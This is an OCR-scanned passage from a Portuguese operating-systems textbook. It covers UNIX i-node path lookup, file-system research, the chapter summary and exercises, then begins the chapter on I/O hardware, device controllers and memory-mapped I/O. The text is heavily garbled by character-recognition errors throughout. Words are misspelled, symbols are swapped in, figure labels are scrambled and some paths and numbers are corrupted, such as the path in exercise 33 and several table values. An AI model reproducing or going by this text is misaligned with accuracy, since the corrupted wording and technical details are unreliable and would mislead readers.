I-node 

I Fi g u ra 4.29 Uma e nt rada de d i retório do UNIX V7, 
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l-riode 



I Figura 4,30 Um i-rsode do UNtX, 


mas o algoritmo e basicamente o mesmo para qualquer 
sistema hicrarąuico dc dirctórios. Piimeiro, o sistema de 
arquivos loeaMza o diretório-raiz. No UN1X, scu i-node fica 
cm um local fixo do disco. A partir desse i-node, cle localiza 
o diretório-raiz, que pode estar eni qualquer lugar do disco, 
mas suponhamos que esteja no bloco 1. 

Em seguida, o sistema de arquivos le o di retorto-raiz e 
busca o primeiro componentc do ca min ho, mr f no diretó¬ 
rio-raiz, a firn dc cncomraro nu mero do i-node do arquivo 
fu$r. Localizar um i-node a partir de sen nu mero ć dimo, 
pois ca da i-node fica eni um local determinado do disco. 
Desse i-node, o sistema localiza o diretório /usr c busca nelc 
o próximo componente, a$L Quando en contra a entrada 
para a$t f ele tem o i-node para o diretório /usr/ast. A partir 
desse i-node, de pode fazer urna busca no p ropno di reto¬ 
rto e localizar mbox. O i-node para esse arquivo e, entao, 


carregado na memória e maulido la aie que o arquivo seja 
fechado* O processo dc busca c ilustrado na Figura 43L 
Nomes dc caminhos relativos sao localizados do mes¬ 
mo modo quc os ahsolutos, só que a partir do diretório 
dc traballio e na o a partir do diretório-raiz. Todo diretó- 
rio tem entradas para . e ,, que sao criadas ąuando 
o diretório c criado. A entrada . tem o mim ero do i-node 
do diretório atual, e a entrada .♦ tem o mimem do i-node do 
diretório-pai. Pot tanio, um procedimento que localiza J 
dick/pro 0 .c simplesmeme localiza „ no diretório de traba- 
llio, enconira o mi mero do i-node do diretório-pai e busca 
pęto diretório dick. Nenhum mccanismo especial c neces- 
sario para łidar corn esses nomes. Conformę o conceilo de 
sistema de diretórios, sao apenas cadcias ASCII comuns, 
assim como qualquer outro riomc. A ii ni ca questao a ser 
observada e que r no diretório raiz,.. aponta para si mesmo. 


Diretório-raiz 


1 


1 


4 

bin 

7 

dev 

14 

lib 

9 

etc 

6 

usr 

8 

tmp 


Procurar usr 
resulta no 
i-node 6 


l-node 6 



l-node 6 
diz que 
/usr esta no 
bloco 132 


Bloco 132 
e o diretório /usr 


6 

* 

1 

* * 

19 

dick 

30 

erik 

51 

jim 

26 

ast 

45 

bal 


/usr/ast 
esta no i-node 
26 


l-node 26 
e para 



Bloco 406 

e o diretório /usr/ast 


26 

* 

6 

•« 

64 

grants 

92 

books 

60 

mbox 

31 

mini* 

17 

sre 


l-nod© 26 
diz que 

/usr/ast esta no 
bloco 406 


/usr/ast/mbcoc 
esta no i-node 
60 


I Figura 4.31 Os passos para pesguisar em /u$r/ast/mbox . 
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FT1 Pesquisas em sistemas de 
_arguiyos_ 

Os sistemas de arquivos sempre airafram muito mais 
pesąuisas que as outras part es dos sistemas operacionais e 
ainda hoje e assim. Enąuanto ja se sabe bastante sobre os 
sistemas de arquivos padrao, ainda ha multa pesquisa sen- 
do feiia sobre o gerenciamento da cache de blocos (Burnei 
cl al., 2002; Ding et al, 2007; Gnaidy et al, 2004; Kroeger 
c Long, 2001; Pat et al, 2000; Zhou ct al, 2001). Ha pes- 
qnisas reladonadas aos novos tipos dc sistemas dc arqui- 
vos, como sistemas dc arqnivos cm nivcl dc ustiirio (Ma- 
zieres, 200J); sistemas dc arquivos fiash (Gal ct al., 2005); 
sistemas de arqtrivos jott malin# (Prabhakaran et al, 2005; 
Stein ct al., 2001); sistemas de arquivos de versionamemo 
(Cornell et al., 2004); sistemas de arquivos p2p (Muthiia- 
charoen et al., 2002), entre outros* O sistema de arquivos 
do Google tambem e pouco comum em razao de sua gran¬ 
dę tolcranda a fallia (Ghemawat et al., 2003). Tambem tern 
sido bastante investigadas as diferentes formas de localiza- 
ęao de i n forma ęao (Padiolcau c Ridoux, 2003). 

Outra area que tein despertado interesse e a proceden- 
cia — o controle do histórieo dos dados, incluindo de onde 
vieram, sen proprietario, e como foram transformados (Mu- 
niswarniy-Reddy et al., 2006; Sliah et al., 2007). Essa infor- 
maęao pode ser uttiizada de diferentes formas. A realizaęao 
de backups tambem continua atraindo interesse (Cox et al, 
2002; Rycroft, 2006), assim como a qu estao da rectipera- 
ęao [Keeton ct al, 2006). Tambem rdadonada as cópias de 
seguranęa es ta a manutcnęao de dados por decadas (Baker 
ct al, 2006; Maniatis et al, 2003), Confianęa c seguranęa 
tambem sao probkmas ainda longe dc serem soludonados 
(Greenan c Miller, 2006; Wires c Feeky, 2007; Wright et al, 
2007; Yang et al., 2006). Por flm, o desempejiho, que sem¬ 
pre foi tema de pesquisa, continua em voga (Caudill e Ga- 
vrikovska, 2006; Chiang e Huang, 2007; Stein, 2006, Wang 
et al., 2006a; Zhang e Ghose, 2007). 

Ihi Resumo _ 

Quando visio de fora, urn sistema dc arquivos ć uma 
coleęao dc arquivos c diretórios mais as operaędcs sobre 
elcs. Os arquivos podern ser lidos c escritos; os diretórios 
podem ser criados c dcstruidos e arquivos po dem ser mo- 
vklos dc um diretório para outro. A maioria dos sistemas 
dc arquivos modernos su porta u tu sistema hierarquico dc 
diretórios, no qual os diretórios podem ter subdiretórios c 
estes podem ter s u bs uh diretórios ad infinitum. 

Yisto de deniro, urn sistema de arquivos c muito dife- 
rentc. Os projetistas dc sistemas de arquivos tern se preo- 
cupado cm dcscobrir como a memórla c alocada c como o 
sistema monitora qual bloco vai para qtial arquivo. Entre as 
possibilidades estao arquivos conliguos, listas cncadcadas, 
labelas dc alocaęao de arqmvos c i-nodes. Sistemas dife- 
rentes tem estru mras dc diretório diferemes* Os atributos 


podem ficar nos diretórios ou em algum outro lugar (por 
exempio, em um i-node). O espaęo em disco pode ser ge- 
rcnciado usando-se listas de espaęos iivres ou mapas de bits, 
A confiabilidadc dos sistemas de arquivos e aperfeięoada a 
partir da realizaęao dc cópias inerementais c dc um progra¬ 
nia quc possa reparar sistemas dc arquivos danifkados. O 
desempenho do sistema dc arquivos e importante c pode 
ser melhorado de varias mandras, incluindo cache de blo¬ 
cos, lei tura antecipada e a colocaęao cuidadosa dos blocos 
de um arqmvo próximos uns dos omros. Os sistemas de ar- 
qtiivos log esiruturados tambem melhoram o desempenho 
fazendo escritas em grandes unidades. 

Entre os cxcmplos dc sistemas dc nrquivos estao ISO 
9660, MS-DOS c 0NIX. Elcs se diferenciam dc varias ma¬ 
ndras, inckisivc pdo modo de monitorar quais blocos vao 
para quais arquivos, pela estrutura de diretórios c pelo ge- 
renciamento do espaęo livre em disco, 

Problemas 

1* Nos prinieiros sistemas UN1X, os arquivos executaveis (ar- 
quivos^,(3wr) comeęavam com um mmiero magico muito 
especifico que nao era escolhido a kaloria men te. Esses ar- 
quivos eram inicializados por um caheęallio, seguido pelos 
segmenlos de eodigo e de dados. Por que voce acha que 
um numeru especifico foi escolhido para os arquivos exe- 
cutaveis, sc outros tipos dc arquivos tinham um nu mero 
magico mais ou men os aleatório como primeira palavra? 

2. Na Tabela 4.2, um dos airibmos e o tamanho do regis- 
tro. Por que o sistema operacioual deve se preocupar com 
isso? 

3. A cha mada de sistema open no DNiX ć absolutamente 
essencial? Quais seria m as consequencias dc nao te-la? 

4. Sistemas que dao suporte a arquivos sequenciais sempre 
tern uma operaęao para rebobinar os arquivos. Os arqui- 
vos que suportam acesso aleatório precisam disso tani- 
bem? 

5. Algiins sistemas operacionais fornecem uma chamada dc 
sistema rename para atribuir um novo nonie a um arąui- 
vo, Ha alguma diferenęa entre usar essa chamada para 
dar um novo nonie a urn arquivo e a pen as copia-lo para 
um novo arquivo com o novo nonie e depois remo^er o 
antigo? 

6. Em alguns sistemas, e possivel mapear parte de um ar- 
quivo na merrtória. Quats restrięoes devem ser imposias a 
esses sistemas? Como ć implemcntado esse mapcamenio 
parciał? 

7. Um sistema operacioual simples suporia somente um 
diretório, mas pemiite que o diretório tenha niuitos ar- 
quivos com tamanhos arbitririos de nomes. Pode ser 
aproxi mada nieme simulado um sistema hierarąuico de 
arquivos? Como? 

8 . No UNIX e no Windows, o accsso aleatório e kito por 
uma chamada de sistema especial que move o ponteiro da 
'posięao atual r associado com um arquivo para um byte 
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eśpecifico no arquivo. Proponha mu modo alLernativode 
fazer o acesso aleatório sem essa chamada de sistema. 

9. Considere a arvorc dc dirciórlos da Figura 4,6. Sc /usr/jim 
for o diretório de trabaiho, qua! e o nonie do caminlio abso- 
luto para o arqiEivo cujo caminho relaiivo e .Jast/x? 

10. A alocaęao comfgua dc arquivos leva a u ma fragmentaęao 
do disco, conforme mcndonado notexLo, pois algum ćspa- 
ęo no ultimo bioto do disco sera desperdięado nos arquivos 
cujo tamanho nao corresponda a urn mimem integral de 
blocos. Essa fragmentaęao e interna ou ex terna? Faqa u ma 
analogia com algo discutido no capitulo amerior 

11. lim modo de usar alocaęao conifgua de disco e nao so 
frer com as lacunas e compactar o disco toda vcz que 
urn arqutvo for removido, Como todos os arquivos sao 
conuguos, copiar um arąuWo requer um posirionamento 
e um atraso rotacional para ler o arqnivo, seguido pela 
transfcrencia a loda a vdoctdadc, Escrever o arquivo dc 
volta para o disco rcquer o mesmo trabaiho, Presumindo 
um tempo de posidonamento de 5 ms, um atraso rota- 
cional de 4 ms, lima taxa dc transfercncia dc B MB/s c 
um tamanho medio dc arqinvo dc S KB, quanto tempo 
seria gasto para ler um arquivo para a memória e, entao, 
escrevedo de volta no disco em um novo local? Usando 
esses nuuiems, quanto tempo tornada compactar meiade 
dc um disco dc 16 GB? 

12. A luz da resposta a questao anterior, faz algum senlido 
compactar o disco? 

13- Alguns compradorcs dc dispositivos digiiais prerisam arma- 
zenardados ■—por exemplg, arquivos. De o nome de um 
dispositivo moderno quc rcqucr armazenamento de arqui- 
vos para o qual a alocaęao conifgua seria u ma boa idei a, 

14. Como o MS-DOS impiementa o aeesso aleatório aos ar- 
quivos? 

15. Considcrc o i-nodc most rado na Figura 4.1 L Sc de con- 
tiver dez endereęos diretos de 4 bytes cada e se todos os 
blocos forem de 1.024 KB, qual sera o tamanho do maior 
arquivo posswcl? 

16. Sugeriu-se que a eficiencia pudesse ser a u me mada e que 
o espaęo cm disco sciia economizado armazenando-se os 
darios dc um pequeno arquivo dentro do i-nodc. Para o 
i-nodc da Figura 4.11, q u ant os bytes dc dados podedam 
ser armażenados dentro dele? 

17. Duas estudames de ciencia da computaęao, Ca roli na e 
Eleonor, estao discutindo sobre i-nodes, Ca roi i na a rg li¬ 
nienia que as rnemórias tem se tornado tao abundames e 
tao baratas que, quando um arquivo e aberto, e mais sim- 
plcs c mais rapido apenas buscar u ma nova cópia do i-nodc 
na tabela dc i-nodes cm vcz dc busca-lo na tabela intcira c 
verifkarseja esta la. Eleonor discorda. Qual de las esł a cena? 

IB. Cite unia vantagem das ligaęocs estritas (Bardlinks) sobre 
as ligaęoes simbólicas e uma vantagem das ligaęoes sim- 
bólicas sobre as ligaęoes estritas. 

19. O espaęo livre do disco pode ser monitorado usando-sc 
urna lista de livrcs ou um mapa dc bits. Os endereęos de 
disco requereni D bits. Para um disco com B blocos, Fdos 
quais livres, estabeteęa □ condięao sob a qual a lista de 
livros usc mc nos espaęo que o mapa de bits. Para Dassu- 


mindo um valor de !ć bits, expresse sua resposta como a 
porcemagem do espaęo em disco qne deve estar livre. 

20. O imcio de um mapa de bits do espaęo livre parece-se 
com isto depois quc a parlięao dc disco ć forma ta da pcla 
primcira vcz; 1000 0000 0000 0000 (o pdmdro bloco ć 
usado pclo di retorto-raiz). O sistema semprc busca blo¬ 
cos livrcs a partir do bloco com o me nor mi mero; assim, 
depois de escrever um arquivo A f que usa seis blocos, o 
mapa de bits se parece com isto: 1111 1110 0000 0000, 
Mostre o tnapa de bits depois de cada uma das seguimes 
aęoes adicionais: 

(a) O arquivo ^e escriio, usando cinco blocos. 

(b> O arquivo A e removido. 

(c) O arquivo Ce escrito, usando oito blocos. 

(d) O arquivo Bć rcmovido, 

21. O que acontcceria se o mapa de bits ot] a lista de blocos 
livres contendo a informaęao sobre blocos de disco livres 
tivessem sido completamemc perdidos em decorrencia de 
um des astrę? Ha algum modo dc recupcrar o disco desse 
desastre ou adeus, disco? Discuta sua resposta, separada- 
mente, para os sistemas dc arqtiivos UN1X e para o FAT-16. 

22. O Era bali 10 not urno de Dlivio Co ruja no centro de compu- 
taęao da imiversidade e mudar as fitas usadas para back- 
-tips dos dados. Enquanto espera que cada Pita ter minę, 
ele trabalha escrevendo sua Lese, que busca provar que 
as peęas de Shakespeare bram escritas por visiiaEties ex- 
traterrestres. O processador de textos dele esecuta em um 
sistema cujo backup esia sendo realizado, |>ois eo unicosis- 
tema dlsporiiYcl Ha algum problenia com cssa situaęao? 

23. Discutimos sobre cópias iiicremeniais com algum nivel dc 
detalhe no texto. No Windows e facil dizer quando copiar 
um arquivQ porquc lodo arquivo tem um bil dc cópia de 
seguranęa. Essc bit nao existc no UN1X, Como os progra- 
mas dc backup do UNIK sabem quais arquivos copiar? 

24. Suponha que o arquivo 21 na Figura 4.22 nao tenha sido 
modificado desde a ultima cópia, De que modo os quatro 
ma pas de bits da Figura 4,23 estariam diferemes? 

25. Sugeriu-se que a primeira parte de cada arquivo UNIK 
seja mantida no mesmo bloco de disco de seu i-node. O 
que lia de bom nisso? 

26. Considcre a Figura 4.24, t possfvel, para algum nu mero es- 
pecffico de blocos, que o contador, em ambas as lisias, co]ite- 
nha o valor 2? Como esse próbie ma poderia ser corrigido? 

27. O dcscmpcnlio dc um sistema de arquivosdepcndc da taxa 
dc acertos da cachc {fraęao de blocos encontrados na cachc). 
Se ele leva I ms para sałisfazer uma requisięao da cacbe, 
mas leva 40 ms para satisfazer uma reąuisięao se for ne- 
cessaria uma leitura de disco, de uma formula para que o 
tempo medio reąuerido satisfaęa uma requisięao se a taxa 
dc acertos for h. Tracę cssa funęao para valorcs de h entre 
0 e 1,0. 

28. Considere a ideia por tras da Figura 4.18. Aplique-a entao 
para um disco com um tempo medio de busca de S ms, 
uma taxa rotadonal de 15 mil rpm e 262,144 bytes por 
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Lrilha. Quais sao as taxas dc dados para lanianhos de blo 
eos de l KB, 1 KB e 4 KB, respectivamente? 

29. Urn ceno sisicma de arquivos usa blocos de disco de 
2 KB. 0 tamanho mediano do arquivo e l KB. Sc todos 
os arquivos forem exatnmente de 1 KB, qual a fraęao de 
espaęo em disco que sera desperdięada? Voce acha que o 
desperdfdo para um si Steni a de arquivos real sera mais 
alto ou mais baixo que esse? Explique. 

30, A tabela FAT-16 do MS-DOS eon te ni 64 K entradas. Su- 
ponha que um dos bits ten ha sido necessario para algum 
outro proposito c que a tabela canEivesse exataniente 
32,768 entradas. Sem quaisqucr outras mudanęas, qual 
teria sido o lamanho do maior arquivo no MS-DOS sob 
essas condięoes? 

31- Os arquivos no MS-DOS competem porcspaęo na tabela 
FAT-Ió na memóiia. Sc algum arquivo usarft entradas — 
quc sao k entradas que nao estao disponfvcis para qual- 
qucr outro arquivo — qual rcstrięao e colocada sobrc o 
tam a n ho total dc todos os arquivos combi na dos? 

32. Um sisiema de arquivos UNIX Lem blocos de l KB e en- 
dereęos de disco de 4 bytes, Qual e o tamanho maximo de 
um arquivo sc os i-nodes comiverem dez entradas diretas 
e uma de cada ciura da indireia: simples, dupla e tripla? 

33- Quantas operaęocs ein disco sao necessarias para buscar 
o i-node do arquivo fmrłastkurmlwtiumdout r? Suponha 
que o i-node para o diretório-raiz es tej a na memória, rnas 
nenii u m outro componente ao longo do caminho sc en- 
contre na meinória. Suponha tambeni que todos os dire- 
rórios caibani em um ilnico bloco de disco. 


34. Em muitos sistemas UNIX, os i-nodes sao mantidos no 
iiiictO do disco. Um prajeto altemativo e alocar um i-node 
quando um arquivo ć triado e colocar o i-node no initio 
do primeiro bloco do arqtiivo. Discuta os pros e os comras 
dessa altematiya, 

35. Escreva um programa que irwerta os bytes de um arqui- 
vo, dc modo que o ultimo byle seja o primeiro c o pri¬ 
meiro seja, emao, o ultimo. Isso deve funcionar com um 
arquivo arbUrariamente longo, mas tente faze-Iodc modo 
razoa vc I mc n tc efid entc. 

36. Escreva um programa quc inicialize em um dado dirctóno 
e percorra a arvorc dc arqirivQS daąuele porno, registrnndo 
os tamanhos de todos os arquivos que encontrar. Quando 
termin ar, cle dcve imprimir um histogram a dos tamanhos 
dcarquivos usando unia faixa com largura especificada por 
um para metro (porexemplo, para 1.024, tamanhos de ar- 
quivos entre 0 e 1.025 ficam cm uma faixa; entre 1,024 c 
2.047, na faixa seguinte c assim por dianie), 

37. Escreva um programa que percorra todos os diretórios de 
um si stema de arquivos UNfX e 1 ocal i ze todos os i-nodes 
com urn ccmtador de Ugaęóes cstrilas contendo um valor 
maior ou igual a 2. Para cada um desses arquivos, relado- 
ne todos os nonies de arquivos que apontem para eles. 

38. Escrcva uma nova versio do programa Is do UN1X, Essa 
yersao tonią como argumento um ou mais nonies dc di¬ 
retórios, c para cada diretório relacione todos os arquivos 
dele, unia llnha por arquivo. Cada campo pode ser for¬ 
ma tado de um modo razoavel, dado seu Lipo. Relacione 
somentc o primeiro endereęo de disco, se houver. 
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Alem de oferecer abstraędes como processos (c Lhrcads), 
espaęos dc endereęamento c arqnivos, osislema operacjo- 
nal lam bem controla todos os disposilivos de E/5 (entrada/ 
saida) de um eomputador, Ele deve emitir comandos para 
os dispositivos, inierceptar imerrupędes e iratar os erros; 
deve lambem fornecer urna interface emrc os dispositivos 
c o restante do sistema quc seja simplcs c lacil dc usar, Na 
medida dopossfrd, ela deveria sera mesma para lodos os 
dispositivos (independenteniente do dispositivo). O códi- 
go de E/S representa uma fraęao significativa dc todo o 
sistema operadonal O modo como o sistema operacional 
gerencia E/S e o assunto deste capitulo. 

Esic capitulo e organ i za do da segulnte forma; primdro 
estudaremos algtins dos prindpios do hardware de E/S c 
depois yeremos o software de E/S cm geral. O software de 
E/S pode ser estruturado cm camadas; cada camada apre- 
senta uma tarefa bem definida para exeeiitar. Neste capi¬ 
tulo, conheceremos cssas camadas — o que elas fazem e 
como se reladonam emrc sL 

Posteriormeme, estudaremos varios dispositivos de 
E/S em detalliest discos, relógios, tedados e videos. Para 
cada dispositivo invcstigaremos sen hardware e scu soft¬ 
ware, Poi fim, trataremos do ger en ci a men to de energia. 



Prindpios do hardware de E/S 


Cada um en cara o hardware de E/S de um jeito. Eu¬ 
genii ciros detrioos o veem como chips, ligaęoes detri- 
cas, suprimento de energia, motores e todos os outros 
componcntes fisi cos que compoem o hardware. Progra- 
madores priorizam a intcrfacc apresentada a o software — 
os comandos que o hardware aceiia, as funęoes que reali- 
za e os erros que podem ser repassados ao software. Neste 
livro, estamos interessados na programaęao dos disposi- 
uvos dc E/S, nao no scu projeio, construęao ou manu- 
lenęao, de maneira que nossa abordagem sera restrita 
a o modo como o hardware e programado, nao como cle 
funciona por denim. No entanto, a programaęao de va- 
rios dispositivos de E/S esta, rmiitas vezes, intimamente 
liga da com suas operaęSes i mer nas. Nas próximas tres se- 
ęoes, apresenraremos uma peqnena visao geral do hard¬ 


ware dc E/S e cle como cle se rclaciona com a programa¬ 
ęao — como uma revisao mais a profilndada do materiał 
imrodutóno da Seęao 1.4. 

5.1.1 [ Dispositivos de E/S 

Os dispositivos de E/S podem ser, de modo generico, 
diyididos em duas categorias: dispositivos de blocos e 
dispositivos de caractere. Um disposilivo dc blocos e 
aquek que armazena informaęao em blocos de tamanho 
f)xo, cada um com seu próprio endereęo, Os ta manhos 
dc blocos comuns variam dc 512 bytes a 32.765 byt es, 
Todas as uansferencias estao em unidades de um ou mais 
blocos intciros (consecutivos). Apropriedadc essencial dc 
um dispóskivo de blocos e quc cada bloco pode ser lido 
ou escriio independenteniente de todos os outros. Discos 
ngidos, CD-ROMs e pen drive$ sao os disposiiivos de blocos 
mais comuns. 

Se observarmos bem, vercmos que c um tanto impre- 
ciso o iimite entre os dispositivos endereęayeis por blocos 
e os quc nao o sao. fi consenso que um disco e urn dts- 
posiiivo endereęavel por bloco, pois, nao importa onde o 
cabeęote esteja no momemo, e sempre posswel posidonar 
para outro cilindro e, entao, esperar o bloco reąuisitado 
roiar sob o cabeęote. Agora pensc em um dispositivo de 
lita magnetica usado para fazer backups dc discos, As fi las 
coniem uma sequencia de blocos. Se o dispositivo de lila 
recebe um comando para ler um bloco N, cle pode sempre 
rebobinar a fila e ir direlo ale aicanęar o bloco N. Essa ope¬ 
ra ęa o e analoga ao posicionamento do disco, exceto que da 
leva muilo mais Lompo. Alem cfisso, pode ou nao ser pos- 
sfvel a reescriia de um bloco no meio da fua. Mesmo que 
seja faciwel usar os disposilivos de fi ta como dispositivos 
de bloco de acesso aleatório — e, com isso, afastar-se lim 
pouco do objetivo principal — des normalnienie nao sao 
cnijmcgados desse modo, 

O outro tipo de dispositwo de E/S e o dispositlyo de ca- 
taaere, o qual envia ou recebe um fluxo de caracteres, sem 
considerar qualquer esirulura de blocos. Ele nao e endere- 
ęavcl c nao dispoc dc qualquer opcraęao de postcionamcn- 
to. Impressoras, interfaces de redes, mouses e a maior parie 
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de outros dispośitivos que sao diferemes do disco podem 
ser considcrados dispositivos de caradere. 

Esse modelo de classificaęao nao e perfeito. Alguns 
dispositivos siniplesmcnte nao se cnquadram nele. Os rc- 
lógios, por exemplo, nao sao endereęaveis por blocos nem 
erwiam ou recebem fluxos de caracteres, Tu do o que des 
fazem e causar interrupęóes em imerealos bem definidos. 
Os videos mapeados na memória tambem nao se enqua- 
dram em nenhuma das duas classificaęoes do modelo aqni 
aprescntado. Ainda assim, o modelo calcado em blocos e 
em caracteres e gerai o bastante para ser usado como base 
para fazcr alguns dos softwares do sistcma operacional quc 
tratam dc E/S independcmes dos dispositivos. 0 sistcma 
de arquivos, por exemplo, lida someme corn dispositivos de 
blocos abstratos e dcixa a parte dependente de dispositivo 
para softwares de nivel mais baixo. 

Os dispositivos de E/S podem apresentar urna ampla 
yariaęao de yelocidades, que impoem uma considerayel 
pressao sobre o software, que tern o dever de trabalhar bem 
cm taxas dc transfeienda de da dos com diferemes ordens 
de magnitudc* A Tabela 5,1 mostra as taxas de dados de 
alguns cB$po$ilivo$ comutis, A maioria desses disposilivos 
ternie a Ikar mais rapida com o passar do tempo. 


Dispositivo 

Taxa de dados 

Tedado 

10 bytes/s 

Mouse 

100 bytes/s 

Modem 56 K 

7 KB/s 

Scanner 

400 KB/s 

Filmadora camcorder digitai 

3,5 MB/S 

Rede sem fio 302,11 g 

6,75 MB/s 

CD-ROM 52x 

7,8 MB/S 

Fast Ethernet 

12,5 MB/s 

Cartao flash compacto 

40 MB/s 

FireWire (IEEE 1394) 

50 MB/s 

USB 2.0 

60 MB/s 

Padrao SONETOCU 2 

78 MB/s 

Disco SCSI Ultra 2 

80 MB/s 

Gigabit Ethernet 

125 MB/s 

Drive de disco BATA 

300 MB/s 

Fita Ultrium 

320 MB/s 

Barramento PCI 

528 MB/S 


Tabela 5.1 Algumas taxas de dados tipicas de dispositivos, 
placas de redes e barramentos. 


5.1.21 Controladores de dispositivos 

As unidades de E/S censisiem, gerai meme, em um 
componente mecanico e um componente eleironico. Mui- 
tas vezes c possfvcl separar as duas parłeś para permitir o 
descnvolvimento de um projeto mais gerai e modular. O 
componente eleironico e chamado de controlador do 
d!spositivo ou adaptador. Noś computadores pessoais, 
ć frequentc de se apresentar na forma de uma płaca eon - 
troladora de circuito impresso que pode ser inserida em u m 
conector de expansao (PCI). O componente mecanico e o 
dispositivo propria menie di to. Essa organizaęao e mosirada 
na Figura i .6. 

A płaca conlrnladora rem, em gerai, um concctor, no 
qual pode ser plugado um cabo quc a conecta ao disposi- 
iivo propriamcme dito. Muitos controladores sao eapazes 
dc tratar dois, ąuatro ou mesmo oito dispositivosidemicos, 
Se a imerface emre o eomrolador e o disposiiivo ć uma 
intcrfacc-padrao — seja ek um padrao olieial ANSl IEEE 
ou ISO ou u m padrao de facio —, as empresas podem de¬ 
seń volver controladores ou dispositwos que aceitem aque- 
la i nt er face. Muitas empresas, por exemplo, deseń volvem 
controladores de disco compatrvei$ com as inlerlaces IDE, 
SATA, SCSI, USB ou FircWire (IEEE 1394). 

A imerface emre o eomrolador do dispositivo e o dis- 
positivo e, com frcquencia, uma imerface de nivel muito 
baixo, Um disco, por cxemplo, pode ser forma ta do com 
10 mil setores de 512 bytes por trilha. No entanto, o que 
realnienie e entregue pela unidade de disco e um lluxo 
serial de bits r comeęando com um preambuło, depois 
4.096 bits em um setor e, por firn, urna soma de yerilicaęao 
(tfiecksum), tambem chama da de código de correęao de 
erro {error-correcting codę — ECC). O preambuło e esaito 
quando o disco e formatado e contem o n Ci mero do eilindro 
e do setor, o tamanho do setor e dados similares, bem como 
as Informaęóes de sincmnizaęao. 

O i raba!ho do eomrolador e convcrter o lluxo serial dc 
bils cm um bloco de byles t execular loda correęao dc erro 
necessana, O bloco de bytes e normalnienie m o ma ci o, bit 
a bit, em um buffer dentro do contro la dor. Após sua soma 
dc verifkaęao (chccksum) ter sido checada e o bloco dccla- 
rado estar livrc dc erros, de pode, entao, ser copiado para 
a memória principal, 

O eomrolador de um monitor de vfdeo tambem fun- 
dona como um dispositivo serial bil a bit, cm um mvd 
iguaimemc baixo. Ele le bytes da memória que contem ca- 
racteres para serem rnostrados no video e gera os sinais 
usados para modular o feixe do tubo de raios calódicos 
{mimie ray tubę — CRT), que fazem com que os ca racic- 
res sejam cscritos na tcla do monitor. Ele tambem gera os 
sinais nccessarios ao retraęo horizontal após a varredura de 
uma lin ha, bem como os sinais dc retraęo vertical após a 
tcla de vfdeo ter sido totalmcnte varrida. Sc o eomrolador 
do CRT nao deseni pen hassć essas fimęóes, o programador 
do sistema operacional leria dc, expl!citamente, programar 
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a yarredura analógica do tubo de imagem. Com o contro- 
lador, o sistema operadonal o inicializa com poticos para- 
metros, como o nu mero de caracreres on pixels por linha 
e o numero de linhas por tcla de vfdeo, ddxando o eon- 
trolador guiar o dirccionamcnto do fdxo. Os monit ores dc 
tcla piana TFT {thinfilm trANSIstor) sao diferentes, mas tao 
complicados quanto os CRT, 

5-1-31 E/5 mapeada na memória 

Cada comrolador lem alguns registradores usados para 
a comunieaęao com a CPU, Por mdo da cscrila nesses rc- 
gistradores, o sistema opera ci on a I pode comandar o dispo- 
sitivo para enlrcgar ou acdlar dados, ligar c desligar ou 
exeeutar atguma outra larefa. A panir da lei tura desses rc- 
gistmdorcs, o sistema operadonal pode descobnr o estado 
do dispositivo, se de esta preparado para acdlar urn novo 
comando e assim por dianie. 

Alcm dos registradores de com role, muiios dispositivos 
tern um bidIer de dados que o sistema operadonal pode ler 
o u cscrcver. Por exemplo, e coinum os compuiadores m os¬ 
tra rem pixels na ida por meio de urna memória de aeesso 
aleaiório (RAM) para vfdeo H a qual e basicamente apenas 
um buffer de dados, disponrecl para ser escrlta pdos pro- 
gramas ou pelo sistema operadonal. 

A questao que surge e como a CPU se cotnunica com 
os registradores dos comroladores e com os bu Herc de dados 
dos dispositivos. Ha duas possibilidades. A primeira e a 
seguinte: cada registrador de eontrole e associado a um 
numero de porta de E/S, um inteiro de S ou 16 bits. O 
conjunto de lodas as port as de E/S fomiam o espaęo de 
portas E/S e somenie o sistema operadonal pode acessa- 
-la f ou seja, a porta e protegtda contra osprogramas comuns 
do usuario. Usando urna instruęao especial de E/S como 

IN REG,PORT 

a CPU pode ler no registrador de controle PORT e ar ma¬ 
że nar o resukado no registrador REG da CPU. Da mesma 
maneira, ao usar 

OUT PORT,REG 

a CPU pode escrever os conteudos de REG para o re¬ 
gistrador de controle PORT. A maioria dos primeiros 


compuiadores — incluindo quase todos os compuiadores de 
grandę porte, como o IBM 360 e todos os seus sucessores — 
funcionava assim. 

De acordo com csse primeiro esquema, os espaęos de 
endereęamento para a memória e H/S sao diferentes, como 
mostra a Figura 5.1(a), As instruęoes 

IN R0,4 
e 

MOV R0 f 4 

sao completamcnte diferentes nesse projeto, A primeira Ić 
o conteudo da porta de E/S 4 c o coloca em RO, ao passo 
que a segunda le o conteudo da palavra de memória 4 e o 
póe em RO. Os numeros 4 nesses cremplos se referem a 
espaęos de endereęamento diferentes e nao relacionados, 

O segundo metodo, apresentado com o PDP-11, visa 
map car todos os registradores de controle no cspaęo dc cn- 
dcrcęamcmo da memória — como ilustra a Figura 5.1(b), 
Cada registrador de controle e assodado a um endereęo 
de memória unico ao qual nenhuma memória e associada, 
Esse sistema e chaniado de E/S mapeada na memória. 
Em geral, os endereęos assoeiados es tao no topo do espaęo 
de endereęamento, Um esquema lifbrido, com buffers de 
dados de E/S mapeados na memória e portas de E/S se- 
paradas para os registradores de controle, e mostrado na 
Figura 5.1(c). O Pentium usa essa arquitetura, com endere¬ 
ęos de 640 K a 1 M - 1 resewados para os buffers de dados 
dos dispositivos cm PCs compativds com a IBM, alcm das 
portas dc E/S dc 0 a 64 K - L 

Como esses esquemas funclonam? Em todos os casos, 
ąuando a CPU quer ler uma palavra — ou da memória ou 
de unia porta de E/S — T ela coloca o endereęo de que pre- 
cisa nas linhas de endereęo do barramento e, entao, emite 
um sinal READ sobre uma linha de controle do barramento, 
Uma segunda linha dc sinal e usada para informar se o es¬ 
paęo sendo rcquisitado c de E/S ou dc memória, Se for um 
espaęo de memória, a memória respondera a requisięao, Se 
for de H/S, o dispositivo dc E/S respondera a requisięm 
Se existesomente espaęo de memória [como na Figura 5.1 (b)], 
cada módulo de memória ecada dispositivode E/S comparam 
as linhas de endereęos com a faixa de endereęos associada a 


I Figura 5.1 


Dois endereęos 


0xFFFF„ 



Me mona 


Portas de E/S 


Um espaęo de 
endereęamemo 
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Dois ospaęos ds 
endereęamento 



(a) Espaęos de memória e E/S separados, (ó) E/S mapeada na memória. (o) Hióricio. 
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cada um. Se os endereęos estao dentro da faixa de um de- 
terminado componente, este responde a requisięao. Yisto 
que na o existe um endereęo associado siniultaneamente a 
memória e a porta dc E/S, nao ha ambigukladc ou eonfliio. 

Os dois esquemas de endereęaniemo dos controladores 
